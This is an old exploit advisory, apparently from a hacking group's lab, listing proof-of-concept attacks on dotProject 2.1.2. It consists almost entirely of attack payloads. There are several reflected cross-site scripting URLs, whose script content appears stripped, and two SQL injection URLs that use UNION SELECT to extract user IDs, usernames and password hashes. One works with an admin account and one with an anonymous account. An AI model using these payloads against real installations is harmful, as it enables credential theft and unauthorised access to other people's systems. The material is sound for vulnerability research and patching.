#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: dotProject 2.1.2 (29/06/2008)
Product WebSite: http://www.dotproject.net/
(*) With some of this exploits you need an ADMIN/ANONYMOUS account
(*) I think that this proyect might be vulnerable to Cross-Site Request Forgery
#========================================================================#
#=============================[XSS]======================================#
POC:
/index.php?m=tasks&inactive=toggle">![]()
/index.php?m=calendar&a=day_view&date=20080828">![]()
/index.php?m=public&a=calendar&dialog=1&callback=setCalendar">![]()
/index.php?m=ticketsmith&type=My'>![]()
#========================================================================#
#=============================[SQL]======================================#
POC as "ADMIN":
/index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users
POC as "ANONYMOUS" or other:
/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#